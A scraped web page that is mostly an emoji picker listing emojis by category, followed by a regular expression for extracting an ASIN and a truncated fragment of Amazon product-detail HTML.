🙌 👏 🤝 👍 👎 👊 ✊ 🤛 🤜 🤞 ✌️ 🤟 🤘 👌 👈 👉 👆 👇 ☝️ ✋ 🤚 🖐 🖖 👋 🤙 💪 🦵 🦶 🖕 ✍️ 🙏 💍 💄 💋 👄 👅 👂 👃 👣 👁 👀 🧠 🦴 🦷 🗣 👤 👥 Clothing and Accessories 🧥 👚 👕 👖 👔 👗 👙 👘 👠 👡 👢 👞 👟 🥾 🥿 🧦 🧤 🧣 🎩 🧢 👒 🎓 ⛑ 👑 👝 👛 👜 💼 🎒 👓 🕶 🥽 🥼 🌂 🧵 🧶 Pale Emojis 👶🏻 👦🏻 👧🏻 👨🏻 👩🏻 👱🏻‍♀️ 👱🏻 👴🏻 👵🏻 👲🏻 👳🏻‍♀️ 👳🏻 👮🏻‍♀️ 👮🏻 👷🏻‍♀️ 👷🏻 💂🏻‍♀️ 💂🏻 🕵🏻‍♀️ 🕵🏻 👩🏻‍⚕️ 👨🏻‍⚕️ 👩🏻‍🌾 👨🏻‍🌾 👩🏻‍🍳 👨🏻‍🍳 👩🏻‍🎓 👨🏻‍🎓 👩🏻‍🎤 👨🏻‍🎤 👩🏻‍🏫 👨🏻‍🏫 👩🏻‍🏭 👨🏻‍🏭 👩🏻‍💻 👨🏻‍💻 👩🏻‍💼 👨🏻‍💼 👩🏻‍🔧 👨🏻‍🔧 👩🏻‍🔬 👨🏻‍🔬 👩🏻‍🎨 👨🏻‍🎨 👩🏻‍🚒 👨🏻‍🚒 👩🏻‍✈️ 👨🏻‍✈️ 👩🏻‍🚀 👨🏻‍🚀 👩🏻‍⚖️ 👨🏻‍⚖️ 🤶🏻 🎅🏻 👸🏻 🤴🏻 👰🏻 🤵🏻 👼🏻 🤰🏻 🙇🏻‍♀️ 🙇🏻 💁🏻 💁🏻‍♂️ 🙅🏻 🙅🏻‍♂️ 🙆🏻 🙆🏻‍♂️ 🙋🏻 🙋🏻‍♂️ 🤦🏻‍♀️ 🤦🏻‍♂️ 🤷🏻‍♀️ 🤷🏻‍♂️ 🙎🏻 🙎🏻‍♂️ 🙍🏻 🙍🏻‍♂️ 💇🏻 💇🏻‍♂️ 💆🏻 💆🏻‍♂️ 🕴🏻 💃🏻 🕺🏻 🚶🏻‍♀️ 🚶🏻 🏃🏻‍♀️ 🏃🏻 🤲🏻 👐🏻 🙌🏻 👏🏻 🙏🏻 👍🏻 👎🏻 👊🏻 ✊🏻 🤛🏻 🤜🏻 🤞🏻 ✌🏻 🤟🏻 🤘🏻 👌🏻 👈🏻 👉🏻 👆🏻 👇🏻 ☝🏻 ✋🏻 🤚🏻 🖐🏻 🖖🏻 👋🏻 🤙🏻 💪🏻 🖕🏻 ✍🏻 🤳🏻 💅🏻 👂🏻 👃🏻 Cream White Emojis 👶🏼 👦🏼 👧🏼 👨🏼 👩🏼 👱🏼‍♀️ 👱🏼 👴🏼 👵🏼 👲🏼 👳🏼‍♀️ 👳🏼 👮🏼‍♀️ 👮🏼 👷🏼‍♀️ 👷🏼 💂🏼‍♀️ 💂🏼 🕵🏼‍♀️ 🕵🏼 👩🏼‍⚕️ 👨🏼‍⚕️ 👩🏼‍🌾 👨🏼‍🌾 👩🏼‍🍳 👨🏼‍🍳 👩🏼‍🎓 👨🏼‍🎓 👩🏼‍🎤 👨🏼‍🎤 👩🏼‍🏫 👨🏼‍🏫 👩🏼‍🏭 👨🏼‍🏭 👩🏼‍💻 👨🏼‍💻 👩🏼‍💼 👨🏼‍💼 👩🏼‍🔧 👨🏼‍🔧 👩🏼‍🔬 👨🏼‍🔬 👩🏼‍🎨 👨🏼‍🎨 👩🏼‍🚒 👨🏼‍🚒 👩🏼‍✈️ 👨🏼‍✈️ 👩🏼‍🚀 👨🏼‍🚀 👩🏼‍⚖️ 👨🏼‍⚖️ 🤶🏼 🎅🏼 👸🏼 🤴🏼 👰🏼 🤵🏼 👼🏼 🤰🏼 🙇🏼‍♀️ 🙇🏼 💁🏼 💁🏼‍♂️ 🙅🏼 🙅🏼‍♂️ 🙆🏼 🙆🏼‍♂️ 🙋🏼 🙋🏼‍♂️ 🤦🏼‍♀️ 🤦🏼‍♂️ 🤷🏼‍♀️ 🤷🏼‍♂️ 🙎🏼 🙎🏼‍♂️ 🙍🏼 🙍🏼‍♂️ 💇🏼 💇🏼‍♂️ 💆🏼 💆🏼‍♂️ 🕴🏼 💃🏼 🕺🏼 🚶🏼‍♀️ 🚶🏼 🏃🏼‍♀️ 🏃🏼 🤲🏼 👐🏼 🙌🏼 👏🏼 🙏🏼 👍🏼 👎🏼 👊🏼 ✊🏼 🤛🏼 🤜🏼 🤞🏼 ✌🏼 🤟🏼 🤘🏼 👌🏼 👈🏼 👉🏼 👆🏼 👇🏼 ☝🏼 ✋🏼 🤚🏼 🖐🏼 🖖🏼 👋🏼 🤙🏼 💪🏼 🖕🏼 ✍🏼 🤳🏼 💅🏼 👂🏼 👃🏼 Moderate Brown Emojis 👶🏽 👦🏽 👧🏽 👨🏽 👩🏽 👱🏽‍♀️ 👱🏽 👴🏽 👵🏽 👲🏽 👳🏽‍♀️ 👳🏽 👮🏽‍♀️ 👮🏽 👷🏽‍♀️ 👷🏽 💂🏽‍♀️ 💂🏽 🕵🏽‍♀️ 🕵🏽 👩🏽‍⚕️ 👨🏽‍⚕️ 👩🏽‍🌾 👨🏽‍🌾 👩🏽‍🍳 👨🏽‍🍳 👩🏽‍🎓 👨🏽‍🎓 👩🏽‍🎤 👨🏽‍🎤 👩🏽‍🏫 👨🏽‍🏫 👩🏽‍🏭 👨🏽‍🏭 👩🏽‍💻 👨🏽‍💻 👩🏽‍💼 👨🏽‍💼 👩🏽‍🔧 👨🏽‍🔧 👩🏽‍🔬 👨🏽‍🔬 👩🏽‍🎨 👨🏽‍🎨 👩🏽‍🚒 👨🏽‍🚒 👩🏽‍✈️ 👨🏽‍✈️ 👩🏽‍🚀 👨🏽‍🚀 👩🏽‍⚖️ 👨🏽‍⚖️ 🤶🏽 🎅🏽 👸🏽 🤴🏽 👰🏽 🤵🏽 👼🏽 🤰🏽 🙇🏽‍♀️ 🙇🏽 💁🏽 💁🏽‍♂️ 🙅🏽 🙅🏽‍♂️ 🙆🏽 🙆🏽‍♂️ 🙋🏽 🙋🏽‍♂️ 🤦🏽‍♀️ 🤦🏽‍♂️ 🤷🏽‍♀️ 🤷🏽‍♂️ 🙎🏽 🙎🏽‍♂️ 🙍🏽 🙍🏽‍♂️ 💇🏽 💇🏽‍♂️ 💆🏽 💆🏽‍♂️ 🕴🏼 💃🏽 🕺🏽 🚶🏽‍♀️ 🚶🏽 🏃🏽‍♀️ 🏃🏽 🤲🏽 👐🏽 🙌🏽 👏🏽 🙏🏽 👍🏽 👎🏽 👊🏽 ✊🏽 🤛🏽 🤜🏽 🤞🏽 ✌🏽 🤟🏽 🤘🏽 👌🏽 👈🏽 👉🏽 👆🏽 👇🏽 ☝🏽 ✋🏽 🤚🏽 🖐🏽 🖖🏽 👋🏽 🤙🏽 💪🏽 🖕🏽 ✍🏽 🤳🏽 💅🏽 👂🏽 👃🏽 Dark Brown Emojis 👶🏾 👦🏾 👧🏾 👨🏾 👩🏾 👱🏾‍♀️ 👱🏾 👴🏾 👵🏾 👲🏾 👳🏾‍♀️ 👳🏾 👮🏾‍♀️ 👮🏾 👷🏾‍♀️ 👷🏾 💂🏾‍♀️ 💂🏾 🕵🏾‍♀️ 🕵🏾 👩🏾‍⚕️ 👨🏾‍⚕️ 👩🏾‍🌾 👨🏾‍🌾 👩🏾‍🍳 👨🏾‍🍳 👩🏾‍🎓 👨🏾‍🎓 👩🏾‍🎤 👨🏾‍🎤 👩🏾‍🏫 👨🏾‍🏫 👩🏾‍🏭 👨🏾‍🏭 👩🏾‍💻 👨🏾‍💻 👩🏾‍💼 👨🏾‍💼 👩🏾‍🔧 👨🏾‍🔧 👩🏾‍🔬 👨🏾‍🔬 👩🏾‍🎨 👨🏾‍🎨 👩🏾‍🚒 👨🏾‍🚒 👩🏾‍✈️ 👨🏾‍✈️ 👩🏾‍🚀 👨🏾‍🚀 👩🏾‍⚖️ 👨🏾‍⚖️ 🤶🏾 🎅🏾 👸🏾 🤴🏾 👰🏾 🤵🏾 👼🏾 🤰🏾 🙇🏾‍♀️ 🙇🏾 💁🏾 💁🏾‍♂️ 🙅🏾 🙅🏾‍♂️ 🙆🏾 🙆🏾‍♂️ 🙋🏾 🙋🏾‍♂️ 🤦🏾‍♀️ 🤦🏾‍♂️ 🤷🏾‍♀️ 🤷🏾‍♂️ 🙎🏾 🙎🏾‍♂️ 🙍🏾 🙍🏾‍♂️ 💇🏾 💇🏾‍♂️ 💆🏾 💆🏾‍♂️ 🕴🏾 💃🏾 🕺🏾 🚶🏾‍♀️ 🚶🏾 🏃🏾‍♀️ 🏃🏾 🤲🏾 👐🏾 🙌🏾 👏🏾 🙏🏾 👍🏾 👎🏾 👊🏾 ✊🏾 🤛🏾 🤜🏾 🤞🏾 ✌🏾 🤟🏾 🤘🏾 👌🏾 👈🏾 👉🏾 👆🏾 👇🏾 ☝🏾 ✋🏾 🤚🏾 🖐🏾 🖖🏾 👋🏾 🤙🏾 💪🏾 🖕🏾 ✍🏾 🤳🏾 💅🏾 👂🏾 👃🏾 Black Emojis 👶🏿 👦🏿 👧🏿 👨🏿 👩🏿 👱🏿‍♀️ 👱🏿 👴🏿 👵🏿 👲🏿 👳🏿‍♀️ 👳🏿 👮🏿‍♀️ 👮🏿 👷🏿‍♀️ 👷🏿 💂🏿‍♀️ 💂🏿 🕵🏿‍♀️ 🕵🏿 👩🏿‍⚕️ 👨🏿‍⚕️ 👩🏿‍🌾 👨🏿‍🌾 👩🏿‍🍳 👨🏿‍🍳 👩🏿‍🎓 👨🏿‍🎓 👩🏿‍🎤 👨🏿‍🎤 👩🏿‍🏫 👨🏿‍🏫 👩🏿‍🏭 👨🏿‍🏭 👩🏿‍💻 👨🏿‍💻 👩🏿‍💼 👨🏿‍💼 👩🏿‍🔧 👨🏿‍🔧 👩🏿‍🔬 👨🏿‍🔬 👩🏿‍🎨 👨🏿‍🎨 👩🏿‍🚒 👨🏿‍🚒 👩🏿‍✈️ 👨🏿‍✈️ 👩🏿‍🚀 👨🏿‍🚀 👩🏿‍⚖️ 👨🏿‍⚖️ 🤶🏿 🎅🏿 👸🏿 🤴🏿 👰🏿 🤵🏿 👼🏿 🤰🏿 🙇🏿‍♀️ 🙇🏿 💁🏿 💁🏿‍♂️ 🙅🏿 🙅🏿‍♂️ 🙆🏿 🙆🏿‍♂️ 🙋🏿 🙋🏿‍♂️ 🤦🏿‍♀️ 🤦🏿‍♂️ 🤷🏿‍♀️ 🤷🏿‍♂️ 🙎🏿 🙎🏿‍♂️ 🙍🏿 🙍🏿‍♂️ 💇🏿 💇🏿‍♂️ 💆🏿 💆🏿‍♂️ 🕴🏿 💃🏿 🕺🏿 🚶🏿‍♀️ 🚶🏿 🏃🏿‍♀️ 🏃🏿 🤲🏿 👐🏿 🙌🏿 👏🏿 🙏🏿 👍🏿 👎🏿 👊🏿 ✊🏿 🤛🏿 🤜🏿 🤞🏿 ✌🏿 🤟🏿 🤘🏿 👌🏿 👈🏿 👉🏿 👆🏿 👇🏿 ☝🏿 ✋🏿 🤚🏿 🖐🏿 🖖🏿 👋🏿 🤙🏿 💪🏿 🖕🏿 ✍🏿 🤳🏿 💅🏿 👂🏿 👃🏿 Animals & Nature 🐶 🐱 🐭 🐹 🐰 🦊 🦝 🐻 🐼 🦘 🦡 🐨 🐯 🦁 🐮 🐷 🐽 🐸 🐵 🙈 🙉 🙊 🐒 🐔 🐧 🐦 🐤 🐣 🐥 🦆 🦢 🦅 🦉 🦚 🦜 🦇 🐺 🐗 🐴 🦄 🐝 🐛 🦋 🐌 🐚 🐞 🐜 🦗 🕷 🕸 🦂 🦟 🦠 🐢 🐍 🦎 🦖 🦕 🐙 🦑 🦐 🦀 🐡 🐠 🐟 🐬 🐳 🐋 🦈 🐊 🐅 🐆 🦓 🦍 🐘 🦏 🦛 🐪 🐫 🦙 🦒 🐃 🐂 🐄 🐎 🐖 🐏 🐑 🐐 🦌 🐕 🐩 🐈 🐓 🦃 🕊 🐇 🐁 🐀 🐿 🦔 🐾 🐉 🐲 🌵 🎄 🌲 🌳 🌴 🌱 🌿 ☘️ 🍀 🎍 🎋 🍃 🍂 🍁 🍄 🌾 💐 🌷 🌹 🥀 🌺 🌸 🌼 🌻 🌞 🌝 🌛 🌜 🌚 🌕 🌖 🌗 🌘 🌑 🌒 🌓 🌔 🌙 🌎 🌍 🌏 💫 ⭐️ 🌟 ✨ ⚡️ ☄️ 💥 🔥 🌪 🌈 ☀️ 🌤 ⛅️ 🌥 ☁️ 🌦 🌧 ⛈ 🌩 🌨 ❄️ ☃️ ⛄️ 🌬 💨 💧 💦 ☔️ ☂️ 🌊 🌫 Food & Drink 🍏 🍎 🍐 🍊 🍋 🍌 🍉 🍇 🍓 🍈 🍒 🍑 🍍 🥭 🥥 🥝 🍅 🍆 🥑 🥦 🥒 🥬 🌶 🌽 🥕 🥔 🍠 🥐 🍞 🥖 🥨 🥯 🧀 🥚 🍳 🥞 🥓 🥩 🍗 🍖 🌭 🍔 🍟 🍕 🥪 🥙 🌮 🌯 🥗 🥘 🥫 🍝 🍜 🍲 🍛 🍣 🍱 🥟 🍤 🍙 🍚 🍘 🍥 🥮 🥠 🍢 🍡 🍧 🍨 🍦 🥧 🍰 🎂 🍮 🍭 🍬 🍫 🍿 🧂 🍩 🍪 🌰 🥜 🍯 🥛 🍼 ☕️ 🍵 🥤 🍶 🍺 🍻 🥂 🍷 🥃 🍸 🍹 🍾 🥄 🍴 🍽 🥣 🥡 🥢 Activity and Sports ⚽️ 🏀 🏈 ⚾️ 🥎 🏐 🏉 🎾 🥏 🎱 🏓 🏸 🥅 🏒 🏑 🥍 🏏 ⛳️ 🏹 🎣 🥊 🥋 🎽 ⛸ 🥌 🛷 🛹 🎿 ⛷ 🏂 🏋️‍♀️ 🏋🏻‍♀️ 🏋🏼‍♀️ 🏋🏽‍♀️ 🏋🏾‍♀️ 🏋🏿‍♀️ 🏋️‍♂️ 🏋🏻‍♂️ 🏋🏼‍♂️ 🏋🏽‍♂️ 🏋🏾‍♂️ 🏋🏿‍♂️ 🤼‍♀️ 🤼‍♂️ 🤸‍♀️ 🤸🏻‍♀️ 🤸🏼‍♀️ 🤸🏽‍♀️ 🤸🏾‍♀️ 🤸🏿‍♀️ 🤸‍♂️ 🤸🏻‍♂️ 🤸🏼‍♂️ 🤸🏽‍♂️ 🤸🏾‍♂️ 🤸🏿‍♂️ ⛹️‍♀️ ⛹🏻‍♀️ ⛹🏼‍♀️ ⛹🏽‍♀️ ⛹🏾‍♀️ ⛹🏿‍♀️ ⛹️‍♂️ ⛹🏻‍♂️ ⛹🏼‍♂️ ⛹🏽‍♂️ ⛹🏾‍♂️ ⛹🏿‍♂️ 🤺 🤾‍♀️ 🤾🏻‍♀️ 🤾🏼‍♀️ 🤾🏾‍♀️ 🤾🏾‍♀️ 🤾🏿‍♀️ 🤾‍♂️ 🤾🏻‍♂️ 🤾🏼‍♂️ 🤾🏽‍♂️ 🤾🏾‍♂️ 🤾🏿‍♂️ 🏌️‍♀️ 🏌🏻‍♀️ 🏌🏼‍♀️ 🏌🏽‍♀️ 🏌🏾‍♀️ 🏌🏿‍♀️ 🏌️‍♂️ 🏌🏻‍♂️ 🏌🏼‍♂️ 🏌🏽‍♂️ 🏌🏾‍♂️ 🏌🏿‍♂️ 🏇 🏇🏻 🏇🏼 🏇🏽 🏇🏾 🏇🏿 🧘‍♀️ 🧘🏻‍♀️ 🧘🏼‍♀️ 🧘🏽‍♀️ 🧘🏾‍♀️ 🧘🏿‍♀️ 🧘‍♂️ 🧘🏻‍♂️ 🧘🏼‍♂️ 🧘🏽‍♂️ 🧘🏾‍♂️ 🧘🏿‍♂️ 🏄‍♀️ 🏄🏻‍♀️ 🏄🏼‍♀️ 🏄🏽‍♀️ 🏄🏾‍♀️ 🏄🏿‍♀️ 🏄‍♂️ 🏄🏻‍♂️ 🏄🏼‍♂️ 🏄🏽‍♂️ 🏄🏾‍♂️ 🏄🏿‍♂️ 🏊‍♀️ 🏊🏻‍♀️ 🏊🏼‍♀️ 🏊🏽‍♀️ 🏊🏾‍♀️ 🏊🏿‍♀️ 🏊‍♂️ 🏊🏻‍♂️ 🏊🏼‍♂️ 🏊🏽‍♂️ 🏊🏾‍♂️ 🏊🏿‍♂️ 🤽‍♀️ 🤽🏻‍♀️ 🤽🏼‍♀️ 🤽🏽‍♀️ 🤽🏾‍♀️ 🤽🏿‍♀️ 🤽‍♂️ 🤽🏻‍♂️ 🤽🏼‍♂️ 🤽🏽‍♂️ 🤽🏾‍♂️ 🤽🏿‍♂️ 🚣‍♀️ 🚣🏻‍♀️ 🚣🏼‍♀️ 🚣🏽‍♀️ 🚣🏾‍♀️ 🚣🏿‍♀️ 🚣‍♂️ 🚣🏻‍♂️ 🚣🏼‍♂️ 🚣🏽‍♂️ 🚣🏾‍♂️ 🚣🏿‍♂️ 🧗‍♀️ 🧗🏻‍♀️ 🧗🏼‍♀️ 🧗🏽‍♀️ 🧗🏾‍♀️ 🧗🏿‍♀️ 🧗‍♂️ 🧗🏻‍♂️ 🧗🏼‍♂️ 🧗🏽‍♂️ 🧗🏾‍♂️ 🧗🏿‍♂️ 🚵‍♀️ 🚵🏻‍♀️ 🚵🏼‍♀️ 🚵🏽‍♀️ 🚵🏾‍♀️ 🚵🏿‍♀️ 🚵‍♂️ 🚵🏻‍♂️ 🚵🏼‍♂️ 🚵🏽‍♂️ 🚵🏾‍♂️ 🚵🏿‍♂️ 🚴‍♀️ 🚴🏻‍♀️ 🚴🏼‍♀️ 🚴🏽‍♀️ 🚴🏾‍♀️ 🚴🏿‍♀️ 🚴‍♂️ 🚴🏻‍♂️ 🚴🏼‍♂️ 🚴🏽‍♂️ 🚴🏾‍♂️ 🚴🏿‍♂️ 🏆 🥇 🥈 🥉 🏅 🎖 🏵 🎗 🎫 🎟 🎪 🤹‍♀️ 🤹🏻‍♀️ 🤹🏼‍♀️ 🤹🏽‍♀️ 🤹🏾‍♀️ 🤹🏿‍♀️ 🤹‍♂️ 🤹🏻‍♂️ 🤹🏼‍♂️ 🤹🏽‍♂️ 🤹🏾‍♂️ 🤹🏿‍♂️ 🎭 🎨 🎬 🎤 🎧 🎼 🎹 🥁 🎷 🎺 🎸 🎻 🎲 🧩 ♟ 🎯 🎳 🎮 🎰 Travel & Places 🚗 🚕 🚙 🚌 🚎 🏎 🚓 🚑 🚒 🚐 🚚 🚛 🚜 🛴 🚲 🛵 🏍 🚨 🚔 🚍 🚘 🚖 🚡 🚠 🚟 🚃 🚋 🚞 🚝 🚄 🚅 🚈 🚂 🚆 🚇 🚊 🚉 ✈️ 🛫 🛬 🛩 💺 🛰 🚀 🛸 🚁 🛶 ⛵️ 🚤 🛥 🛳 ⛴ 🚢 ⚓️ ⛽️ 🚧 🚦 🚥 🚏 🗺 🗿 🗽 🗼 🏰 🏯 🏟 🎡 🎢 🎠 ⛲️ ⛱ 🏖 🏝 🏜 🌋 ⛰ 🏔 🗻 🏕 ⛺️ 🏠 🏡 🏘 🏚 🏗 🏭 🏢 🏬 🏣 🏤 🏥 🏦 🏨 🏪 🏫 🏩 💒 🏛 ⛪️ 🕌 🕍 🕋 ⛩ 🛤 🛣 🗾 🎑 🏞 🌅 🌄 🌠 🎇 🎆 🌇 🌆 🏙 🌃 🌌 🌉 🌁 Objects 🆓 Try Audible today to get 📗📕 two free Audiobooks of your choice. ⌚️ 📱 📲 💻 ⌨️ 🖥 🖨 🖱 🖲 🕹 🗜 💽 💾 💿 📀 📼 📷 📸 📹 🎥 📽 🎞 📞 ☎️ 📟 📠 📺 📻 🎙 🎚 🎛 ⏱ ⏲ ⏰ 🕰 ⌛️ ⏳ 📡 🔋 🔌 💡 🔦 🕯 🗑 🛢 💸 💵 💴 💶 💷 💰 💳 🧾 💎 ⚖️ 🔧 🔨 ⚒ 🛠 ⛏ 🔩 ⚙️ ⛓ 🔫 💣 🔪 🗡 ⚔️ 🛡 🚬 ⚰️ ⚱️ 🏺 🧭 🧱 🔮 🧿 🧸 📿 💈 ⚗️ 🔭 🧰 🧲 🧪 🧫 🧬 🧯 🔬 🕳 💊 💉 🌡 🚽 🚰 🚿 🛁 🛀 🛀🏻 🛀🏼 🛀🏽 🛀🏾 🛀🏿 🧴 🧵 🧶 🧷 🧹 🧺 🧻 🧼 🧽 🛎 🔑 🗝 🚪 🛋 🛏 🛌 🖼 🛍 🧳 🛒 🎁 🎈 🎏 🎀 🎊 🎉 🧨 🎎 🏮 🎐 🧧 ✉️ 📩 📨 📧 💌 📥 📤 📦 🏷 📪 📫 📬 📭 📮 📯 📜 📃 📄 📑 📊 📈 📉 🗒 🗓 📆 📅 📇 🗃 🗳 🗄 📋 📁 📂 🗂 🗞 📰 📓 📔 📒 📕 📗 📘 📙 📚 📖 🔖 🔗 📎 🖇 📐 📏 📌 📍 ✂️ 🖊 🖋 ✒️ 🖌 🖍 📝 ✏️ 🔍 🔎 🔏 🔐 🔒 🔓 Symbols ❤️ 🧡 💛 💚 💙 💜 🖤 💔 ❣️ 💕 💞 💓 💗 💖 💘 💝 💟 ☮️ ✝️ ☪️ 🕉 ☸️ ✡️ 🔯 🕎 ☯️ ☦️ 🛐 ⛎ ♈️ ♉️ ♊️ ♋️ ♌️ ♍️ ♎️ ♏️ ♐️ ♑️ ♒️ ♓️ 🆔 ⚛️ 🉑 ☢️ ☣️ 📴 📳 🈶 🈚️ 🈸 🈺 🈷️ ✴️ 🆚 💮 🉐 ㊙️ ㊗️ 🈴 🈵 🈹 🈲 🅰️ 🅱️ 🆎 🆑 🅾️ 🆘 ❌ ⭕️ 🛑 ⛔️ 📛 🚫 💯 💢 ♨️ 🚷 🚯 🚳 🚱 🔞 📵 🚭 ❗️ ❕ ❓ ❔ ‼️ ⁉️ 🔅 🔆 〽️ ⚠️ 🚸 🔱 ⚜️ 🔰 ♻️ ✅ 🈯️ 💹 ❇️ ✳️ ❎ 🌐 💠 Ⓜ️ 🌀 💤 🏧 🚾 ♿️ 🅿️ 🈳 🈂️ 🛂 🛃 🛄 🛅 🚹 🚺 🚼 🚻 🚮 🎦 📶 🈁 🔣 ℹ️ 🔤 🔡 🔠 🆖 🆗 🆙 🆒 🆕 🆓 0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟 🔢 #️⃣ *️⃣ ⏏️ ▶️ ⏸ ⏯ ⏹ ⏺ ⏭ ⏮ ⏩ ⏪ ⏫ ⏬ ◀️ 🔼 🔽 ➡️ ⬅️ ⬆️ ⬇️ ↗️ ↘️ ↙️ ↖️ ↕️ ↔️ ↪️ ↩️ ⤴️ ⤵️ 🔀 🔁 🔂 🔄 🔃 🎵 🎶 ➕ ➖ ➗ ✖️ ♾ 💲 💱 ™️ ©️ ®️ 〰️ ➰ ➿ 🔚 🔙 🔛 🔝 🔜 ✔️ ☑️ 🔘 ⚪️ ⚫️ 🔴 🔵 🔺 🔻 🔸 🔹 🔶 🔷 🔳 🔲 ▪️ ▫️ ◾️ ◽️ ◼️ ◻️ ⬛️ ⬜️ 🔈 🔇 🔉 🔊 🔔 🔕 📣 📢 👁‍🗨 💬 💭 🗯 ♠️ ♣️ ♥️ ♦️ 🃏 🎴 🀄️ 🕐 🕑 🕒 🕓 🕔 🕕 🕖 🕗 🕘 🕙 🕚 🕛 🕜 🕝 🕞 🕟 🕠 🕡 🕢 🕣 🕤 🕥 🕦 🕧 Flags All flag emojis for every country. 🏳️ 🏴 🏁 🚩 🏳️‍🌈 🏴‍☠️ 🇦🇫 🇦🇽 🇦🇱 🇩🇿 🇦🇸 🇦🇩 🇦🇴 🇦🇮 🇦🇶 🇦🇬 🇦🇷 🇦🇲 🇦🇼 🇦🇺 🇦🇹 🇦🇿 🇧🇸 🇧🇭 🇧🇩 🇧🇧 🇧🇾 🇧🇪 🇧🇿 🇧🇯 🇧🇲 🇧🇹 🇧🇴 🇧🇦 🇧🇼 🇧🇷 🇮🇴 🇻🇬 🇧🇳 🇧🇬 🇧🇫 🇧🇮 🇰🇭 🇨🇲 🇨🇦 🇮🇨 🇨🇻 🇧🇶 🇰🇾 🇨🇫 🇹🇩 🇨🇱 🇨🇳 🇨🇽 🇨🇨 🇨🇴 🇰🇲 🇨🇬 🇨🇩 🇨🇰 🇨🇷 🇨🇮 🇭🇷 🇨🇺 🇨🇼 🇨🇾 🇨🇿 🇩🇰 🇩🇯 🇩🇲 🇩🇴 🇪🇨 🇪🇬 🇸🇻 🇬🇶 🇪🇷 🇪🇪 🇪🇹 🇪🇺 🇫🇰 🇫🇴 🇫🇯 🇫🇮 🇫🇷 🇬🇫 🇵🇫 🇹🇫 🇬🇦 🇬🇲 🇬🇪 🇩🇪 🇬🇭 🇬🇮 🇬🇷 🇬🇱 🇬🇩 🇬🇵 🇬🇺 🇬🇹 🇬🇬 🇬🇳 🇬🇼 🇬🇾 🇭🇹 🇭🇳 🇭🇰 🇭🇺 🇮🇸 🇮🇳 🇮🇩 🇮🇷 🇮🇶 🇮🇪 🇮🇲 🇮🇱 🇮🇹 🇯🇲 🇯🇵 🎌 🇯🇪 🇯🇴 🇰🇿 🇰🇪 🇰🇮 🇽🇰 🇰🇼 🇰🇬 🇱🇦 🇱🇻 🇱🇧 🇱🇸 🇱🇷 🇱🇾 🇱🇮 🇱🇹 🇱🇺 🇲🇴 🇲🇰 🇲🇬 🇲🇼 🇲🇾 🇲🇻 🇲🇱 🇲🇹 🇲🇭 🇲🇶 🇲🇷 🇲🇺 🇾🇹 🇲🇽 🇫🇲 🇲🇩 🇲🇨 🇲🇳 🇲🇪 🇲🇸 🇲🇦 🇲🇿 🇲🇲 🇳🇦 🇳🇷 🇳🇵 🇳🇱 🇳🇨 🇳🇿 🇳🇮 🇳🇪 🇳🇬 🇳🇺 🇳🇫 🇰🇵 🇲🇵 🇳🇴 🇴🇲 🇵🇰 🇵🇼 🇵🇸 🇵🇦 🇵🇬 🇵🇾 🇵🇪 🇵🇭 🇵🇳 🇵🇱 🇵🇹 🇵🇷 🇶🇦 🇷🇪 🇷🇴 🇷🇺 🇷🇼 🇼🇸 🇸🇲 🇸🇦 🇸🇳 🇷🇸 🇸🇨 🇸🇱 🇸🇬 🇸🇽 🇸🇰 🇸🇮 🇬🇸 🇸🇧 🇸🇴 🇿🇦 🇰🇷 🇸🇸 🇪🇸 🇱🇰 🇧🇱 🇸🇭 🇰🇳 🇱🇨 🇵🇲 🇻🇨 🇸🇩 🇸🇷 🇸🇿 🇸🇪 🇨🇭 🇸🇾 🇹🇼 🇹🇯 🇹🇿 🇹🇭 🇹🇱 🇹🇬 🇹🇰 🇹🇴 🇹🇹 🇹🇳 🇹🇷 🇹🇲 🇹🇨 🇹🇻 🇻🇮 🇺🇬 🇺🇦 🇦🇪 🇬🇧 🏴󠁧󠁢󠁥󠁮󠁧󠁿 🏴󠁧󠁢󠁳󠁣󠁴󠁿 🏴󠁧󠁢󠁷󠁬󠁳󠁿 🇺🇳 🇺🇸 🇺🇾 🇺🇿 🇻🇺 🇻🇦 🇻🇪 🇻🇳 🇼🇫 🇪🇭 🇾🇪 🇿🇲 🇿🇼 😃💁 People • 🐻🌻 Animals • 🍔🍹 Food • 🎷⚽️ Activities • 🚘🌇 Travel • 💡🎉 Objects • 💖🔣 Symbols • 🎌🏳️‍🌈 Flags New Emojis Emojis from Emoji 11.0: New in 2018. 🥰 🥵 🥶 🥳 🥴 🥺 👨‍🦰 👩‍🦰 👨‍🦱 👩‍🦱 👨‍🦲 👩‍🦲 👨‍🦳 👩‍🦳 🦸 🦸‍♀️ 🦸‍♂️ 🦹 🦹‍♀️ 🦹‍♂️ 🦵 🦶 🦴 🦷 🥽 🥼 🥾 🥿 🦝 🦙 🦛 🦘 🦡 🦢 🦚 🦜 🦞 🦟 🦠 🥭 🥬 🥯 🧂 🥮 🧁 🧭 🧱 🛹 🧳 🧨 🧧 🥎 🥏 🥍 🧿 🧩 🧸 ♟ 🧮 🧾 🧰 🧲 🧪 🧫 🧬 🧯 🧴 🧵 🧶 🧷 🧹 🧺 🧻 🧼 🧽 ♾ 🏴‍☠️
Emoji Identifier
2020-06-02T16:29:08.000Z
<div\s[\s\S]*?\"detailBulletsWrapper_feature_div[\s\S]*?<div\s[\s\S]*?detailBullets_feature_div[\s\S]*?<ul[\s\S]*?ASIN:[\s\S]*?<\/span>\s*<span>([\s\S]*?)<\/span>
<div id="detailBulletsWrapper_feature_div" data-feature-name="detailBullets" data-template-name="detailBullets" class="a-section a-spacing-none feature" data-cel-widget="detailBulletsWrapper_feature_div"> <div id="detailBullets_feature_div"> <ul class="a-unordered-list a-nostyle a-vertical a-spacing-none"> <li><span class="a-list-item"> <span class="a-text-bold">Product Dimensions: </span> <span>5 x 5 x 0.7 inches</span> </span></li> <li><span class="a-list-item"> <span class="a-text-bold">Shipping Weight: </span> <span>12 ounces (<a href="https://www.amazon.com/gp/help/seller/shipping.html/ref=dp_pd_shipping?_encoding=UTF8&amp;seller=&amp;asin=B07F9GS3VY">View shipping rates and policies</a>)</span> </span></li> <li><span class="a-list-item"> <span class="a-text-bold">ASIN: </span> <span>B07F9GS3VY</span> </span></li> <li><span class="a-list-item"> </span></li> <li><span class="a-list-item"> <span class="a-text-bold">Item model number: </span> <span>WXAGLHP2</span> </span></li> <li><span class="a-list-item"> <span class="a-text-bold">Date first listed on Amazon: </span> <span>September 11, 2013</span> </span></li> </ul> </div> <div id="dpx-amazon-sales-rank_feature_div"> <style type="text/css"> .zg_hrsr_item 